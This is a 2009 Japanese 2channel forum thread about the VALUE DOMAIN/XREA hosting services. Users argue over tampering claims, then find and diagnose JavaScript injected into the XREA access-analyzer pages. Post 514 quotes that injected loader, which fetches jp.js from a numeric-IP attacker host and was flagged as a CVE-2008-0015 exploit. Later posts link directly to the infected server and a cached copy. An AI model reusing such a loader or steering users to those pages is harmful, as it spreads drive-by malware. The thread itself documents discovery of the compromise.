VALUE DOMAINってどうよ？ part33

1 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:18:47 0] VALUE DOMAIN:バリュードメイン https://www.value-domain.com/ サポート https://www.value-domain.com/support.php sb.xrea.com/forumdisplay.php?f=21 ◆前スレ VALUE DOMAINってどうよ？ part32 pc11.2ch.net/test/read.cgi/hosting/1239851317/ 481 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:33:49 0] 自分で確認できなかった事と事実をなかったことにしろっていうのは違うだろ。 公式がないって言ってんのを名無しを信じろっていうほうが無理だろ 482 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:34:15 0] なかったことにしたい人が必死すぎてこわい 483 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:34:58 0] 俺から見れば名無しで書き込んで、信じろっていうやつのほうが頭おかしいと思うが 484 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 15:35:42 0] >>480 お金を取って、ログまで残して回答してるのと、 2chのどっちを信るかろと言えば、前者だろ。 ちょっと考えれば、value-domainってlocalアドレスを 自分のPCで書き換えれば、URI付き魚拓なんて捏造いくらでもできるからな。 絶対ガセ 485 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:35:51 0] >>482 頭大丈夫？ 486 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:36:06 0] 名無しの問題じゃなくて、魚拓の信頼性だろ 487 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:36:48 0] どうせわざとやってんだから相手にすんなよ 488 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:38:47 P] >>481 そんなこと言うなら、 「公式がないって言ってる」という情報源だって名無しだろうが 489 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:40:23 0] 急にP付で書き込んでてﾌｲﾀｗ 恥を知れｗ 490 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:42:04 0] >>484 それ自分はだませるけど魚拓側のリゾルバはだませないだろ？ 491 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 15:43:50 0] ガセを流した方々へ コンタクトフォームで問い合わせしてるやしまで現れて、 デジロックは無駄な労力使ってる。 そろそろ許してやれよなーー 492 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:44:45 0] ActiveX…恐ろしい子っ！ 493 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:44:54 0] >>490 localhost value-domain.com でいいんでない？ 494 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:45:39 P] >>481 まあいいや。 君が善意の第三者と仮定するなら、君の言い分も分からないではない。 ただソースをこの目で確認した俺からすれば、隠蔽工作をしているデジロックに 対して心底腹が立つ。 てか俺、完璧釣られてるのかな。 495 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:46:24 0] >>493 魚拓のコンテンツ取得って魚拓のサーバーがやってるんだから ローカルのホスト情報関係ないと思ったんだけどそういう仕組みじゃないんだっけ？ 496 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:46:29 0] >>493 魚拓サイトのサーバにそれをどうやって書き込むの？ 自分のPCだけだよそれで騙せるのは 497 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:48:00 0] 魚拓というアーカイバーか。なるほど。 498 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:48:17 0] 被害にあったっていうならふしあなで書き込めばいいんじゃない？ そうすれば擁護の連中も信じるかもよ？ >おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。 >で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、 >仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、 >サポートにその申し送りがされてないとしか考えられない。 499 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:48:27 0] >>494 ええ、釣られてると思いますよ 500 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:49:08 0] >>494 ヒント：現在勤務時間中 501 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:50:05 0] ID出れば社員がわかって便利なのに不便だな 502 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:52:13 0] お待ちかねの社員乙のタイミングですねｗ わざわざご苦労さま 503 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:53:08 0] ガセ情報を流しているのは社員の方ですね 504 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:53:16 P] >>499-500 だよねぇ・・・。 >>498 べつにやってもいいけど、何の根拠にもならんだろ。 相手が善意の第三者でないなら尚更のこと。 505 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:55:31 0] 意味がわからない・・・ 506 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:57:04 P] いっそまちBBSとか、全員強制IPのところでやれば面白い。 507 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:57:37 O] まぁ、そのうちにドメイン乗っ取りが開始されれば、少しはここも静かになるわな。 508 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:57:52 0] WEB魚拓の中の人に連絡してみる どっちかが捏造してるんだろ？それは罪を問われるべき 509 名前：508 [2009/07/08(水) 16:00:36 0] デジロの捏造だとしたら救いようない問題だし WEB魚拓経由で捏造してウィルス撒いてるとしても問題 これは白黒つけるべき 510 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:01:34 0] ややこしくなるからお前もうでてくんなよ 511 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:01:49 P] あ、関係ないかもしれないけど、 今XREAのアクセスアナライザー　ttp://ax.xrea.com/ のログイン画面で、アバスト反応した。 ↓こんなんみたいだけど。 JS:CVE-2008-0015-A [Expl] これって今回の騒動は関係ない？ 512 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:03:09 0] >>511 ある！　同じjsが 513 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:04:14 0] うわ！マジで居る 見に行くならスクリプト切っていけよ 514 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:04:42 0] >>511 </head>タグのちょうどうえ <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement('script'); js.src ="ｈｔｔｐ://1856317799:888/ｊｐ．ｊｓ"; try {document.getElementsByTagName('head')[0].appendChild(js);} catch(exp){} js = null; </SCRIPT> </HEAD> 515 名前：511 mailto:sage [2009/07/08(水) 16:06:11 P] どうも。アバスト反応して、入る前にすぐ削除したけどびっくりしたわ。>>511 昨日の昼ぐらいまでは、こんなん反応しなかったハズ。 516 名前：511 mailto:sage [2009/07/08(水) 16:08:03 P] 今もうPCの電源落としてアドエスからP2経由でレスしてるんで、 魚拓等必要あれば誰かたのんますー。 517 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:08:07 O] デジロ社員はこんなとこで遊んでないで… とっととデジロウイルスの対策をしろよ 518 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:09:17 0] login.phpにあるの？今ソース確認中 519 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:09:26 0] IE使ってる人は要注意だなこりゃ 520 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:10:11 0] >>518 違う、>>511 をよく読め 521 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:10:15 0] この人病気なんかな・・・ 522 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:10:57 0] value-domainの方は大丈夫だねさすがに 523 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:12:05 0] ログイン画面じゃなくてトップページじゃない？ 524 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:12:58 0] なくなった… 525 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:13:36 0] トップページとログイン画面のソース見たけど >>514に書かれてるやつなかったよ。別のページなのかな 526 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:14:11 0] たしかに貼られた直後見に行ったけど無かった すでに消されてたのか？ 527 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:14:16 0] まだ残ってるよ いい加減なこと言うな 528 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:14:24 0] >>525 いやもうない 529 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:14:33 0] おいｗふざけるのもいい加減にしろｗ >>511みてすぐ行ったけど確認できなかったぞ！ 釣られた俺が恥ずかしいだろうがあああああああああああああああ！ｗｗｗ 530 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:15:53 0] 自分も見つからなかったが、>>511が書き込まれた直後に対策されたか？ ソースチェッカーオンラインでは16:11にチェックされたキャッシュが残っていて、そこでは不正コードが確認できる ttp://so.7walker.net/?site=http%3A%2F%2Fax.xrea.com%2Flogin.php&hua= （魚拓と違っていつまでこの不正コード入りキャッシュが残ってるかは不明 531 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:15:55 0] ある。ほぼ同じコードが入っている。jp.js 532 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:17:36 0] >>530のソースは確かに確認できた。 けどやはりアクセス解析の方はもう無いみたいだよ。 533 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:18:10 0] リアルタイムで改竄されてるの？ 534 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:18:24 0] たった今消えたな なんかついたり消えたりしてる？ 535 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:18:30 0] いやはやなんともｗ 釣りじゃなくて本当にあったんだがもうなくなってるわ、少なくとも俺は確認できない 自分で見なきゃ信じられんのは俺も同じだから罵倒されてもしょうがないけど やべぇ、ウィルスとかそんな問題より現状が面白くてしょうがないｗ 536 名前：529 [2009/07/08(水) 16:18:54 0] わろたｗｗｗなんだこいつｗ 537 名前：154 mailto:sage [2009/07/08(水) 16:18:55 0] 問い合わせてから2営業日経とうとしているがその後の回答が全く無い ガセならガセでいいんだが、「改竄の事実はございません」の公式アナウンスがなぜできない！ 技術に自信がないのか？ブランド信用力の低下が怖いのか？（今さら！） ＶＤとは6年近い付き合いだけど、今さっき全ドメイン移管手続きを執ったよ。。。 今回の件だけはVDのトップページで公式にアナウンスして欲しかった。 改竄の事実が無いなら「無い」と堂々と宣言できないVDには愛想が尽きたよ。 538 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:19:56 0] 念のため全ページのソース見てきた。 今のとこはコード入ってないようだ。 539 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:20:23 0] 16:17 の時点に wget で確認したけど、確かに混入してるね。 バランサで混入ありソースとなしソースが流れてるんじゃね？ 540 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:20:25 0] 魚拓のURLをよく見ろスキームはhttpsだ。 これがねつ造であるなら、SSLでなりすましが可能である事を示してる。 541 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:20:42 0] >>511 おもいっきり仕込まれてる。ソースで言うと62〜68行目。 64行目に 1856317799:888/jp.js がある。 542 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:20:55 0] デジロック関連はしばらくスクリプト切ってアクセスしたほうがいいんじゃねえか 543 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:21:29 0] 消えた。攻撃者がここ見ててひっこめたとかだと嫌だな。 544 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:22:23 0] それだと上げてるやつが一番怪しく思えるぞｗ まーそんなことはないでしょ 545 名前：539 [2009/07/08(水) 16:23:13 0] こいつぜってー頭狂ってるｗ 546 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:23:14 0] ax.xrea.comは全部のページやられてるなｗ 547 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:23:31 0] >>539 うわ、まじだ >Name: ax.xrea.com >Addresses: 219.101.229.188, 219.101.229.189 前者に不正コード確認、後者はなし ttp://219.101.229.188/login.php (現時点で不正コード注意) 548 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:24:07 0] この板に社員が常駐して、問題があるたびに直しているとしか思えないな 549 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:24:22 0] 魚拓がちょうど今メンテナンス中で取れないんだよなぁ 何が起こっているのかだけでも早く知りたいよ アナウンスしろよVD 550 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:24:44 0] >>539が正解じゃないか？ 551 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:24:48 0] >>539 ax.xrea.comは2台だな。 219.101.229.188 ←やられてる 219.101.229.189 ←やられてない 552 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:25:17 0] さっきからコードないないって書き込んでる奴だけど >>547のURLでなら確認できた。 553 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:25:25 0] >>548 それはそれで対応してくれてるなら助かるけどさ 再アップロードしてはい直しました！って話だったらトルチョックかましたくなる 554 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:26:01 0] とりあえず、何度か取得してみたけど、あり・なしが落ちてくるね。 ありindex.html：11818 byte で CR+LF なしindex.html：11310 byte で LF diff は改行コード以外は 62〜68 行目の SCRIPT だけだね。 555 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:26:11 0] >>547 専ブラで飛んじゃうような貼り方するなよ… 556 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:27:20 0] 魚拓のメンテ終わるのと不正コード除去とどっちがはやいかな >>555 すまん、以後http全部抜くわ 557 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:28:38 0] アクセス解析タグに仕込むことも出来るんじゃと思ったら ぞっとした 558 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:28:40 0] ひょっすると社員も確認する術がなくて、ガセなんじゃ・・・とか思ってるのかもなｗｗ たぶん、リアルタイムに罠貼ったり外したりしてるｗ 俺は、7月5日の夜中にwikiwiki.jpの方でトロイphp仕込まれてるのみたけど、 5分後には、なくなってたりとか、管理人が削除したにしては、やけに対応が早いなとは思った。 559 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:29:50 0] 踏んできた。一発でヒット www1.axfc.net/uploader/He/so/233661.png dlkey: dxvwvd 560 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:30:13 0] バレる前に削除して、定期的にパスを抜いてんだろうな よくよく考えるとかなり深刻じゃないか？ 561 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:31:09 0] >>445 「個人情報の取り扱いについて」で ＞ユーザー登録時に申請された情報は一切公開されません。当データベースサーバー内に保存され、厳重に保管されます。 ＞自動課金等のオプションをお客様が選択される場合、クレジットカード情報が当サーバーに保存されます。それらの情報は当データベースサーバー内で暗号化・保存され、厳重に保管されます。 とはあるけど、果たして罰せられるのかねえ 「責任の限界について」で>>141に加えて ＞あらゆるユーザーデータの操作処理 もあると思ったけど、不正アクセスは操作処理ではなく通常の管理だから違うのか ＞あらゆる非常事態が発生したことによる損失 今回のことが非常事態といえるのか ＞あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失 あらゆる原因に法的例外とかはないのか とここまで考えて思ったんだけど。。。 562 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:32:03 0] 責任の限界もなにも通常業務レベルでセキュリティ対策は必須事項っすよ 563 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:33:32 0] でも不正コード削除してもログは残るんじゃないの？ 内部の人が書き換えてるじゃなければ、分かりそうなもんだよね？ 564 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:33:38 0] これやばいだろ… 565 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:35:14 0] ここのアクセス解析使ってるとこたくさん見るから やばいんじゃないかな…さすがに。 566 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:35:50 P] >>561 法律家じゃないから根拠法とかわからんけど、消費者保護の観点から消費者に著しく不利な契約は無効とかじゃなかった？ 果たすべき管理責任を果たさないことにより利用者が損害を受けた場合は当然賠償責任が発生すると思うけど。 567 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:36:01 0] value-domainならまだ利用者数はそれほどでもないだろうけど xreaとなると話はだいぶ違ってくるね 568 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:36:17 0] 魚拓が改鼠されているとかいうとんでも理論をデジロックが発表するのに期待・・・ と思ったらxreaにも仕込まれてたか、どうみてもデジロックやられてるだろｗ 569 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:36:43 P] アクセス解析のサーバーとバリュドメのサーバーは別だよね。 デジロ関係が軒並み侵入されてるってこと？ >>563 同意。 570 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:37:31 0] いつ改竄されたのかヘッダ見ようと思ったらこれ動的に生成してるのね。 >>554 index.htmlは存在しない。index.php。 このサーバのPHPの出力に全部くっついてくる気がする。 571 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:39:10 0] >>570 あぁ、すまん。そういやそうだね。 572 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:39:13 0] こうなると次はXREAかCOREのadmin.cgiにも仕組まれるのかな jsの中身見たら不正コードに混じって忍者TOOLS提供の アクセスカウンタのコードが入っていて憎たらしいと思った 573 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:39:49 0] いつものコピペの事務員レベルじゃ状況把握出来てないっぽいな。終わってる。 すべてのphpスクリプトの安全宣言出るまで使えないでしょ。 574 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:42:05 0] 規約の法的拘束力って限界あるよね 電子商取引等に関する準則 ?目次? 第１．オンライン取引_ 5(3) なりすましを生じた場合の認証機関の責任 74.125.155.132/search?q=cache:_khHgPhY4rcJ:www.meti.go.jp/topic/downloadfiles/e2032 575 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:42:19 0] >セキュリティベンダーなどの公開情報によれば、この脆弱性を悪用した攻撃コードは既に広範囲に仕掛けられた形跡があり、日本のサイトも含まれるという。 internet.watch.impress.co.jp/docs/special/20090708_300654.html 今回の事と関係なし？ 576 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:42:23 0] こんなに自在に書き換えできるんなら、よっぽど管理者を馬鹿にしてないかぎり、足跡消すはず で、公式発表は、改ざんはないんだっけ？　どうなの、これ 577 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:42:56 P] XREAとかにFTPのログインしても大丈夫なんだろうか 578 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:43:19 0] 忍者のアクセスカウンタだと…？ 579 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:43:35 0] >>575 いやそのものずばりだよ。 580 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:43:40 0] お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。 581 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:44:03 0] 今回のはjpgに仕組まれてるのが怖いな

---

---

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef